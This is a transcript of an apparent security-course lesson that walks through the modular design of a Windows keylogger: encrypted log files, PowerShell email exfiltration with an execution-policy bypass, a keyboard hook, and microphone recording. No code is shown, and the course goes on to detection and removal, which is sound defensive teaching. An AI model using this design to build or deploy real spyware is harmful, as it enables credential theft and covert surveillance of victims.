A keylogger is malicious software commonly used in malware, spyware, as part of a virus. A keylogger records every single key stroke meaning every button you press on your keyboard is logged and then sent to a remote attacker. This means they get all of your usernames, your passwords and even the answers to your secret security questions like your mother's maiden name which you can't change. Advanced keyloggers can even This video show the audio capturing capabilities of a keylogger.
- [Instructor] Now that we have seen this keylogger in action, let's look at the structure of this particular one. Keep in mind that malware is constantly changing, and just like regular software, the structure of malware is entirely up to its authors. However, the end goal is always the same which is, extracting as much information as possible from the target machine, which in this case is you. There are six object that make up this keylogger. It has a modular design, so more features can be easily added.
Let's go over each one. The DateTime object is a utility. Its purpose is to save the log files with the current date and time the recording started so the hacker knows when you were online. It's used mainly by the logger class. The next component in this keylogger is the encrypter, which encrypts all the keystrokes the victim has typed before writing the key recordings to the .log file. This is done in case the user somehow stumbles upon the log file. It won't be obvious they are being recorded.
The encrypter is used by the logger class when a log file write has been triggered. The Keys class is the object that holds a list of all virtual key possibilities on a gaming keyboard based on their hardware interrupt code and maps them to a human-readable format. Now for the logger object, which is the component that handles all of the log file creation operations, from directory creation to writing encrypted keystrokes with the encrypter object and DateTime object.
Now for the email sending component. There are two objects that handle auto-email sending. The first is the MailSender object, which handles everything needed to send an email containing the recordings. This includes the PowerShell script creation, which is used to send the email. This PowerShell script has an option which enables the keylogger to bypass admin privileges that are normally required. Google "Powershell -execution policy bypass" for more information.
The second email component is the MailTimer object. The MailTimer object is a thread which handles asynchronous execution repeatedly for a set number of times. It takes in a task to be repeated and executed on a separate thread. This is required in order to record both keystrokes and the microphone audio stream at the same time. Now the core, the meat of this keylogger, is the part where it hooks into the Windows system message pump and installs a subroutine that monitors and processes all message traffic for keyboard presses before they reach their original intended target.
Now for the record audio task. This record audio task is the add-on which now allows this keylogger to record anything said over your microphone, whether it's your laptop's integrated microphone or a USB headset. The end-point audio device writes to the audio stream. This is why the recorded wav files have nothing but static noise at certain points, because the audio stream contained no data with voices. The keylogger does not manipulate this audio stream in any way. It simply reads from the buffer that the microphone device writes to.
We discuss this add-on in much more detail when we look at the source code in the next video.
- Installing the Windows Performance Toolkit
- Reviewing keylogger source code
- Setting up a private call environment
- Gathering keylogger evidence
- Spyware audio usage analysis
- Spyware removal
- Microphone recording prevention tips